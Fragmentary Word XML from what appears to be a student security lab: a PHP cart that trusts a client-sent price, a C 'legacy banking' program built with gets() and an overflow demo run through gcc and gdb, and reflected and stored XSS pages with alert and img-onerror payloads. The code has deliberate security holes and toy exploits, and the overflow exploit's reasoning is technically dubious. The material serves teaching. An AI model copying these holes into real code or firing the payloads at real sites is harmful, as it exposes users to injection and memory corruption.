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771B7" w:rsidRPr="00FB549B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FB549B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Develop an E-Commerce web page that uses GET and POST methods. And identify and exploit vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003177CD" w14:textId="77777777" w:rsidR="008306EB" w:rsidRDefault="008306EB" w:rsidP="008306EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E50FC7D" w14:textId="7A7801DB" w:rsidR="008306EB" w:rsidRDefault="008306EB" w:rsidP="008306EB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folder in xampp/htdocs/</w:t>
      </w:r>
      <w:r w:rsidR="00E4420F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sahil1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B2BDE5" w14:textId="1BE07DAD" w:rsidR="00E4420F" w:rsidRDefault="00E4420F" w:rsidP="008306EB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Index.html-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0856551B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&lt;!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DOCTYPE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html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30BA993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html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lang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"en"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1755228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head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CDD95C9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meta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charset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"UTF-8"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4BC7FDE9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title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E-Commerce Store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title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5264AED5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head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B93FD63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body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76CC143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h1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Welcome to Our Store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h1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23F22C0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form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action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"cart.php"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method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"GET"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6B24D984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h2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Products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h2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FB99EE0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label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for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"product"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Choose a product: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label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0F10F662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select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id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"product"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name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"product"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18C8BC96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option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value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"item1"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Product 1 - $10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option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67F775B2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option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value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"item2"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Product 2 - $20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option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1B6B1824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option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value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"item3"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Product 3 - $30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option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689D4D2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select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0B681E3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input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type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"hidden"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name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"price"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id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"price"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value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"10"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14A1B636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1AD7F9CE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label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for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"quantity"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Quantity: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label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6A97128C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input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type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"number"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id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"quantity"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name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"quantity"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value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"1"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min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"1"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40AF8656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8C1664A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input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type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"submit"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value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"Add to Cart"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1E7DDE94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form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5DD0A85C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body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8D7AE09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html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42EDFD71" w14:textId="315F221F" w:rsidR="008306EB" w:rsidRDefault="00E4420F" w:rsidP="008306EB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Cart.php-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15370D9A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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C11860A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session_start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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47502E36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C586C0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>if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(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!</w:t>
      </w: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isset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$_SESSION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'cart'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])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A099BC4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$_SESSION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'cart'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]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array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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA9995B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6CE1CB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C586C0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>if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(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$_SERVER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'REQUEST_METHOD'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]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==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'GET'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&amp;&amp;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isset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$_GET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'product'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])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&amp;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721F0940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isset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$_GET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'quantity'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])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&amp;&amp;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isset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$_GET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'price'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])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB2DAA8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$product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$_GET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'product'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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077B22FF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$quantity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$_GET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'quantity'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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FA3A73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$price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$_GET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'price'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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA10EE4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7CA668"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>// Store item in session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C514BF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lastRenderedPageBreak/>
        <w:t>$item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array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"product"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$product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, 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"quantity"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$quantity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, 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"price"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=&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B9CE03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$price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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A210EC5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array_push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$_SESSION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'cart'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],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$item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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614098EB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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06376B3B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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17197394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&lt;!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DOCTYPE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html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4673B0A2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html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lang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"en"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5F4C15B6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head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04E9BF50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meta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charset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"UTF-8"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165D0B86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title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Shopping Cart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title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0A8FD4A5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head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4ADD83ED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body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F1AE79A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h1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Your Cart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h1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3633C3E1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table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F44747"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>border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"1"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AEE6CC5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tr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7CFC032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th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Product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th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680D171A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th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Quantity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th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593C3196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th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Price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th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5472BF8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tr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466EB930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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C33617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$total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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFEC70D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C586C0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>foreach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(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$_SESSION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'cart'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]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as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$item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) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78272E7D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echo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"&lt;tr&gt;"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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122F597D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echo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"&lt;td&gt;"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.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htmlspecialchars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$item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'product'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])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.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"&lt;/td&gt;"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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D88CF6D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echo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"&lt;td&gt;"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.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htmlspecialchars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$item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'quantity'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])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.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"&lt;/td&gt;"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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A5938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echo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"&lt;td&gt;"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.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htmlspecialchars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$item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'price'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])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.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"&lt;/td&gt;"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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8DA445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echo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"&lt;/tr&gt;"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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E3A642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$total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+=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$item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'quantity'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] </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4420F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*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$item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'price'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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166E1EDA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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A241D4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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C41113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table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CCFBC12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h2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Total: $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&lt;?php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echo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htmlspecialchars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$total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); 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?&gt;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h2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486F0B41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form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action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"checkout.php"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method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"POST"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670FA6A2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input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type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"submit"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E4420F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value</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4420F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E4420F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"Proceed to Checkout"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5E7895E0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form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531AAA56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body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410577AA" w14:textId="77777777" w:rsidR="00E4420F" w:rsidRPr="00E4420F" w:rsidRDefault="00E4420F" w:rsidP="00E4420F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E4420F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html</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4420F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659EBCCC" w14:textId="77777777" w:rsidR="00E4420F" w:rsidRDefault="00E4420F" w:rsidP="008306E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0000002" w14:textId="1884970C" w:rsidR="006771B7" w:rsidRPr="00427349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27349">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Implement a stack buffer overflow</w:t>
      </w:r>
      <w:r w:rsidR="003F614A" w:rsidRPr="00427349">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00427349">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack using a procedural language on the "Legacy Banking System". Explain the concept of stack buffer overflow and discuss techniques to prevent such attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A84D4FB" w14:textId="77777777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12E1865" w14:textId="77777777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  <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CODE-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09561607" w14:textId="741617F4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(make folder on desktop-&gt;two-&gt;your_files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392BE33B" w14:textId="77777777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6A48D259" w14:textId="3868E7D9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legacy_banking.c-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E0965B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>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F51AE4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>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41158401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175F8C5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>typedef struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D598AC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 xml:space="preserve">    char accountHolderName[10];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4EE91B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 xml:space="preserve">    int accountBalance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34519CDB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>} Account;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FB54B3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9ED3A61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>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE595E6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 xml:space="preserve">    Account acc;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB4595E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7D5498F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 xml:space="preserve">    printf("Enter account holder's name (Max 10 characters): ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C73C7B2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 xml:space="preserve">    acc.accountBalance = 1000;  // Default balance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C0BBD9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 xml:space="preserve">    gets(acc.accountHolderName);  // Vulnerable function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF358E9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EA6BDD6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 xml:space="preserve">    printf("Thank you %s! Account Balance: $%d\n", acc.accountHolderName, acc.accountBalance);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCD7064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 xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFCEE7C" w14:textId="3D5D8844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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11193894" w14:textId="77777777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5136417" w14:textId="45038851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attack.c-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC19510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>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8077CF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5B467AD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>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E80F061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4FA307E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3928B35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D2300AF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>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F36584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2DDE1D0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 xml:space="preserve">    // Change accountBalance to 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8A5D10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652CB0CB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 xml:space="preserve">    printf("%s%c", "aaaaaaaaaaaa", '\x27');  // Assuming 0x27 is the value that sets balance to 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A20D5B3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E87397A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B31847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24B50671" w14:textId="77777777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 w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109D1E73" w14:textId="77777777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06E10CA" w14:textId="77777777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383273C7" w14:textId="465F9C8C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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0CC355" w14:textId="2697DC2D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Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6858B7E2" w14:textId="0745C7CF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two</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A129543" w14:textId="63261CE0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gcc -fno-stack-protector -o test legacy_banking.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB67BC8" w14:textId="5D4CFD68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gdb test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0828DDB2" w14:textId="7DCE5CB2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break main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F62A1CC" w14:textId="37F576AF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B038E6" w14:textId="7BE64E73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info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726D6688" w14:textId="27A0F000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disas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FF6CC8" w14:textId="553EF1D6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x/20 0x7fffffffde00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FC85D1" w14:textId="1A6ACEC0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next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF42B65" w14:textId="166965DD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(enter holder’s name more than max 10 characters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1A9986" w14:textId="4D251D35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p/x 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2335EF6D" w14:textId="77777777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3E466B69" w14:textId="610508DE" w:rsidR="00C9432F" w:rsidRP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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F831755" w14:textId="598356E7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Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74465040" w14:textId="293FE89C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two</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E107327" w14:textId="79813914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gcc -o attack attack.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FCC9CA" w14:textId="3A887C79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./attack | ./test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48087573" w14:textId="77777777" w:rsidR="00C9432F" w:rsidRDefault="00C9432F" w:rsidP="00C9432F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0000003" w14:textId="77777777" w:rsidR="006771B7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9E3126">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Create Social media Web Page and Perform a reflected  cross-site scripting (XSS) attack on it . </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31860BC3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>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7E0BFB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>&lt;html lang="en"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449E9BB6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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C874F4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&lt;meta charset="UTF-8" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3B7455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&lt;title&gt;XSS Demo&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEAA37D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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478EDE9B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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFEC53D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&lt;h1&gt;Welcome to Our Social Media Page&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE18257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&lt;form action="" method="GET"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C51FA87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&lt;label for="name"&gt;Enter your name:&lt;/label&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0004EC5B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&lt;input type="text" id="name" name="name" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EC1455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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      &lt;button type="submit"&gt;Submit&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D4E058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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAF3AAD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06AED39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&lt;div id="greeting"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211B4640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&lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E62D4FA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Hello,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209143FD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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEA15D6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  document.write(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5254C1E4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    decodeURIComponent(window.location.search.substring(6))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189F35E7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  );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE38BE0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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A79E99D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! Welcome to our website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620412AF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&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514DBDEE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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7C450E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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0A811D" w14:textId="7071EBA5" w:rsid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>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484CD67B" w14:textId="21550B22" w:rsid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Vulnerable function- &lt;script&gt;alert(‘XSS ATTACK’)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F49688" w14:textId="77777777" w:rsidR="004E02A2" w:rsidRPr="009E3126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0000004" w14:textId="77777777" w:rsidR="006771B7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yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C14A7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Create Social media Web Page and Perform a Stored  cross-site scripting (XSS) attack on it . </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A01E3B0" w14:textId="61646B19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  <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D659E8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>app.js-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B16058B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>const userMessages = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DFA8FF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D631016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>const userMessageForm = document.querySelector('form');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6CE07A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>const userMessagesList = document.querySelector('ul');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EC82E8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7766EF45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>function renderMessages() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F626F9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let messageItems = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7841F080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for (const message of userMessages) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B45ABC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messageItems = `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66099811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${messageItems}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191B9FBE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&lt;li class="message-item"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CBEE26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&lt;div class="message-image"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517C1580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  &lt;img src="${message.image}" alt="${message.text}"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2051A658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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77674573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&lt;p&gt;${message.text}&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE0318E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&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D9FA43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`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5362C8D6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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF942F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43A48BC4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userMessagesList.innerHTML = messageItems;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A92BCFD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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A690723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7A43794B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>function formSubmitHandler(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09911934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event.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E80832F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const userMessageInput = event.target.querySelector('textarea');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43356AC1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const messageImageInput = event.target.querySelector('input');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734D4F4B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const userMessage = userMessageInput.value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E7E0A3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const imageUrl = messageImageInput.value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A1B8BD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7838F74F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if (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C748AEF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!userMessage ||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E02C8C4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!imageUrl ||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDCEE28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userMessage.trim().length === 0 ||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A93E09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imageUrl.trim().length === 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BDC060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) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028A0C4E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alert('Please insert a valid Password.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0506AF42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return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7E1CD1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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D246458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382A5A36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userMessages.push({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD3A614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text: userMessage,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11972CA7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image: imageUrl,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F98BEE8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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E0CBFB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37FE4635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userMessageInput.value = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D839EB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messageImageInput.value = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7232BDF7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1FAEA584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renderMessages();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A108B4E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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BCD45A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622B5031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>userMessageForm.addEventListener('submit', formSubmitHandler);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EC06EA" w14:textId="32B05D4A" w:rsid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>//some-page.com/no-image.jpg" onerror ="alert('Hacked!')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6388CC4B" w14:textId="77777777" w:rsid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60F950BF" w14:textId="645D46D8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  <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D659E8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Index.html-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E152ED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>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D37228B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lastRenderedPageBreak/>
        <w:t>&lt;html lang="en"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6734FD2B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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E1502E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&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCDF4B0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body {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4430E711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background-image: url('https://wallpapertag.com/wallpaper/full/e/1/4/826909-hospital-wallpapers-1920x1080-hd.jpg');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231D5CEE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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3882E390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&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1060E1A2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&lt;meta charset="UTF-8" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBCC0EA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&lt;meta name="viewport" content="width=device-width, initial-scale=1.0" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3741D2A2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&lt;h1 style="font-size: 60px;"&gt;NOBLE HOSPITAL&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733A73FB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&lt;link rel="stylesheet" href="style.css" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248049F0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&lt;script src="app.js" defer&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A14970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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8B31F2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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D07C5BE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&lt;section id="user-input"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E39BFAB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&lt;form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087B056D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&lt;div class="form-control"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728BD546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  &lt;label for="user-message"&gt;USERNAME&lt;/label&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7981E4D9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  &lt;textarea id="user-message" name="user-message"&gt;&lt;/textarea&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073553F1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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E208D0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&lt;div class="form-control"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3178D93F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  &lt;label for="message-image"&gt;PASSWORD&lt;/label&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04331CE2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  &lt;input type="text" id="message-image" name="message-image" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E7B928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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB71011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  &lt;button type="submit"&gt;LOGIN&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF04287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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68351387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&lt;/section&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573AFDC1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&lt;section id="user-messages"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D25BB8B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  &lt;ul&gt;&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B988295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  &lt;/section&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D68C16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 xml:space="preserve">  &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170A5BFE" w14:textId="55C8E881" w:rsid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 w:rsidRPr="00D659E8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F46F12" w14:textId="77777777" w:rsid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C3491D8" w14:textId="2CB51E3D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  <w:u w:val="single"/>
        </w:rPr>
